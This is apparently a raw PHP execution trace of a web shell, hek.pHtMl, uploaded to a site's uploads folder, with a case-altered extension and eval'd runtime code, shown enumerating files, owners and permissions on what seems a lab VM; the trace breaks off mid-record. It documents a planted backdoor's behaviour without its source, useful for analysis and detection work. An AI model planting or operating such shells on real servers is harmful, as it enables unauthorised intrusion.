/var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 1 209137418240 7 73 0 0.012755 1315584 sprintf 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 311 2 '%1.2f' 194.77439880371 7 73 1 0.012770 1315968 7 73 R '194.77' 6 72 1 0.012784 1315624 6 72 R '194.77 GB' 6 74 0 0.012798 1315584 round 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 2 90.13929917941 2 6 74 1 0.012813 1315656 6 74 R 90.14 6 75 0 0.012829 1315968 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 1 '/var/www/html/uploads/' 7 76 0 0.012848 1315968 is_readable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/' 7 76 1 0.012871 1316008 7 76 R TRUE 7 77 0 0.012884 1315968 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/' 7 77 1 0.012901 1316008 7 77 R TRUE 7 78 0 0.012915 1315968 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 '/var/www/html/uploads/' 7 78 1 0.012932 1316032 7 78 R 16895 7 79 0 0.012945 1315992 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 16895 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 324 $i = 'd' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= 'x' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= 'w' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= 'x' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= 'w' 7 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= 'x' 7 79 1 0.013077 1316032 7 79 R 'drwxrwxrwx' 6 75 1 0.013091 1316072 6 75 R 'drwxrwxrwx' 6 80 0 0.013109 1316504 gethostbyname 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 252 1 'localhost' 6 80 1 0.013149 1316584 6 80 R '127.0.0.1' 5 35 1 0.013167 1311592 5 81 0 0.013176 1311592 hardScandir 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 911 1 '/var/www/html/uploads/' 6 82 0 0.013192 1311592 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 348 1 'scandir' 6 82 1 0.013207 1311632 6 82 R TRUE 6 83 0 0.013220 1311592 scandir 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 349 1 '/var/www/html/uploads/' 6 83 1 0.013255 1312216 6 83 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'hek.pHtMl', 5 => 'prepend.php'] 5 81 1 0.013277 1312184 5 81 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'hek.pHtMl', 5 => 'prepend.php'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 911 $dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'hek.pHtMl', 5 => 'prepend.php'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 914 $sort = [0 => 'name', 1 => 1] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 928 $files = [] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 928 $dirs = [] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 929 $n = 6 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i = 0 5 84 0 0.013380 1312208 fileowner 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 '.' 5 84 1 0.013396 1312232 5 84 R 0 5 85 0 0.013409 1312192 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 0 5 85 1 0.013434 1312992 5 85 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 5 86 0 0.013476 1312960 filegroup 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 '.' 5 86 1 0.013491 1313000 5 86 R 0 5 87 0 0.013503 1312960 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 0 5 87 1 0.013526 1313616 5 87 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 5 88 0 0.013564 1314056 filemtime 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 1 '/var/www/html/uploads/.' 5 88 1 0.013581 1314112 5 88 R 1676237247 5 89 0 0.013594 1314024 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 2 'Y-m-d H:i:s' 1676237247 5 89 1 0.013627 1314352 5 89 R '2023-02-12 16:27:27' 5 90 0 0.013643 1314328 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 936 1 '/var/www/html/uploads/.' 6 91 0 0.013658 1314328 is_readable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/.' 6 91 1 0.013675 1314368 6 91 R TRUE 6 92 0 0.013688 1314328 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/.' 6 92 1 0.013705 1314368 6 92 R TRUE 6 93 0 0.013718 1314328 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 '/var/www/html/uploads/.' 6 93 1 0.013732 1314368 6 93 R 16895 6 94 0 0.013750 1314328 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 16895 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 324 $i = 'd' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= 'x' 6 94 1 0.013876 1314368 6 94 R 'drwxrwxrwx' 5 90 1 0.013890 1314408 5 90 R 'drwxrwxrwx' 5 95 0 0.013907 1314408 filesize 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 937 1 '/var/www/html/uploads/.' 5 95 1 0.013923 1314448 5 95 R 4096 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 939 $tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] 5 96 0 0.013960 1314408 is_file 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 941 1 '/var/www/html/uploads/.' 5 96 1 0.013976 1314448 5 96 R FALSE 5 97 0 0.013989 1314408 is_link 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 943 1 '/var/www/html/uploads/.' 5 97 1 0.014006 1314472 5 97 R FALSE 5 98 0 0.014019 1314432 is_dir 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 945 1 '/var/www/html/uploads/.' 5 98 1 0.014034 1314472 5 98 R TRUE 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i++ 5 99 0 0.014059 1314384 fileowner 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 '..' 5 99 1 0.014074 1314408 5 99 R 0 5 100 0 0.014087 1314368 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 0 5 100 1 0.014111 1315168 5 100 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 5 101 0 0.014154 1314400 filegroup 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 '..' 5 101 1 0.014168 1314440 5 101 R 0 5 102 0 0.014181 1314400 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 0 5 102 1 0.014204 1315056 5 102 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 5 103 0 0.014241 1314920 filemtime 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 1 '/var/www/html/uploads/..' 5 103 1 0.014258 1314984 5 103 R 1676237247 5 104 0 0.014271 1314888 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 2 'Y-m-d H:i:s' 1676237247 5 104 1 0.014303 1315216 5 104 R '2023-02-12 16:27:27' 5 105 0 0.014318 1315200 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 936 1 '/var/www/html/uploads/..' 6 106 0 0.014333 1315200 is_readable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/..' 6 106 1 0.014350 1315240 6 106 R TRUE 6 107 0 0.014367 1315200 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/..' 6 107 1 0.014384 1315240 6 107 R TRUE 6 108 0 0.014408 1315200 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 '/var/www/html/uploads/..' 6 108 1 0.014423 1315240 6 108 R 16895 6 109 0 0.014436 1315200 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 16895 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 324 $i = 'd' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= 'x' 6 109 1 0.014562 1315240 6 109 R 'drwxrwxrwx' 5 105 1 0.014577 1315280 5 105 R 'drwxrwxrwx' 5 110 0 0.014599 1315280 filesize 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 937 1 '/var/www/html/uploads/..' 5 110 1 0.014614 1315320 5 110 R 4096 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 939 $tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] 5 111 0 0.014652 1314456 is_file 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 941 1 '/var/www/html/uploads/..' 5 111 1 0.014667 1314496 5 111 R FALSE 5 112 0 0.014680 1314456 is_link 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 943 1 '/var/www/html/uploads/..' 5 112 1 0.014697 1314504 5 112 R FALSE 5 113 0 0.014711 1314464 is_dir 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 945 1 '/var/www/html/uploads/..' 5 113 1 0.014725 1314504 5 113 R TRUE 5 114 0 0.014739 1314408 array_merge 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 946 2 ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] ['type' => 'dir'] 5 114 1 0.014765 1314848 5 114 R ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 946 $dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i++ 5 115 0 0.014827 1315160 fileowner 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 '.htaccess' 5 115 1 0.014845 1315184 5 115 R 0 5 116 0 0.014858 1315144 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 0 5 116 1 0.014883 1315944 5 116 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 5 117 0 0.014927 1315176 filegroup 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 '.htaccess' 5 117 1 0.014946 1315216 5 117 R 0 5 118 0 0.014959 1315176 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 0 5 118 1 0.014982 1315832 5 118 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 5 119 0 0.015020 1315696 filemtime 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 1 '/var/www/html/uploads/.htaccess' 5 119 1 0.015037 1315752 5 119 R 1676237247 5 120 0 0.015051 1315656 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 2 'Y-m-d H:i:s' 1676237247 5 120 1 0.015083 1315984 5 120 R '2023-02-12 16:27:27' 5 121 0 0.015098 1315968 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 936 1 '/var/www/html/uploads/.htaccess' 6 122 0 0.015113 1315968 is_readable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/.htaccess' 6 122 1 0.015149 1316008 6 122 R TRUE 6 123 0 0.015163 1315968 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/.htaccess' 6 123 1 0.015181 1316008 6 123 R FALSE 6 124 0 0.015195 1315968 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 343 1 '/var/www/html/uploads/.htaccess' 6 124 1 0.015209 1316008 6 124 R 33188 6 125 0 0.015222 1315968 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 343 1 33188 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 322 $i = '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= '-' 6 125 1 0.015348 1316008 6 125 R '-rw-r--r--' 5 121 1 0.015362 1316048 5 121 R '-rw-r--r--' 5 126 0 0.015379 1316048 filesize 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 937 1 '/var/www/html/uploads/.htaccess' 5 126 1 0.015394 1316088 5 126 R 64 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 939 $tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root'] 5 127 0 0.015431 1315672 is_file 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 941 1 '/var/www/html/uploads/.htaccess' 5 127 1 0.015447 1315712 5 127 R TRUE 5 128 0 0.015460 1315616 array_merge 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 942 2 ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root'] ['type' => 'file'] 5 128 1 0.015485 1316056 5 128 R ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 942 $files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i++ 5 129 0 0.015548 1316368 fileowner 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 'data' 5 129 1 0.015566 1316384 5 129 R 0 5 130 0 0.015579 1316344 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 0 5 130 1 0.015604 1317144 5 130 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 5 131 0 0.015647 1316376 filegroup 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 'data' 5 131 1 0.015661 1316416 5 131 R 0 5 132 0 0.015674 1316376 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 0 5 132 1 0.015697 1317032 5 132 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 5 133 0 0.015736 1316896 filemtime 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 1 '/var/www/html/uploads/data' 5 133 1 0.015753 1316960 5 133 R 1676237247 5 134 0 0.015767 1316864 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 2 'Y-m-d H:i:s' 1676237247 5 134 1 0.015800 1317192 5 134 R '2023-02-12 16:27:27' 5 135 0 0.015815 1317176 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 936 1 '/var/www/html/uploads/data' 6 136 0 0.015830 1317176 is_readable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/data' 6 136 1 0.015848 1317216 6 136 R TRUE 6 137 0 0.015861 1317176 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/data' 6 137 1 0.015878 1317216 6 137 R TRUE 6 138 0 0.015891 1317176 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 '/var/www/html/uploads/data' 6 138 1 0.015906 1317216 6 138 R 16895 6 139 0 0.015919 1317176 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 345 1 16895 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 324 $i = 'd' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= 'x' 6 139 1 0.016045 1317216 6 139 R 'drwxrwxrwx' 5 135 1 0.016060 1317256 5 135 R 'drwxrwxrwx' 5 140 0 0.016077 1317256 filesize 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 937 1 '/var/www/html/uploads/data' 5 140 1 0.016092 1317296 5 140 R 4096 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 939 $tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] 5 141 0 0.016130 1316880 is_file 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 941 1 '/var/www/html/uploads/data' 5 141 1 0.016145 1316920 5 141 R FALSE 5 142 0 0.016162 1316880 is_link 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 943 1 '/var/www/html/uploads/data' 5 142 1 0.016179 1316920 5 142 R FALSE 5 143 0 0.016193 1316880 is_dir 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 945 1 '/var/www/html/uploads/data' 5 143 1 0.016208 1316920 5 143 R TRUE 5 144 0 0.016221 1316824 array_merge 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 946 2 ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] ['type' => 'dir'] 5 144 1 0.016246 1317264 5 144 R ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 946 $dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i++ 5 145 0 0.016307 1317200 fileowner 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 'hek.pHtMl' 5 145 1 0.016324 1317224 5 145 R 1000 5 146 0 0.016336 1317184 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 1000 5 146 1 0.016369 1318000 5 146 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 $ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash'] 5 147 0 0.016413 1317232 filegroup 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 'hek.pHtMl' 5 147 1 0.016428 1317272 5 147 R 1000 5 148 0 0.016440 1317232 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 1000 5 148 1 0.016474 1317888 5 148 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 $gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000] 5 149 0 0.016511 1317752 filemtime 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 1 '/var/www/html/uploads/hek.pHtMl' 5 149 1 0.016528 1317808 5 149 R 1676237247 5 150 0 0.016542 1317712 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 2 'Y-m-d H:i:s' 1676237247 5 150 1 0.016574 1318040 5 150 R '2023-02-12 16:27:27' 5 151 0 0.016589 1318024 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 936 1 '/var/www/html/uploads/hek.pHtMl' 6 152 0 0.016604 1318024 is_readable 0 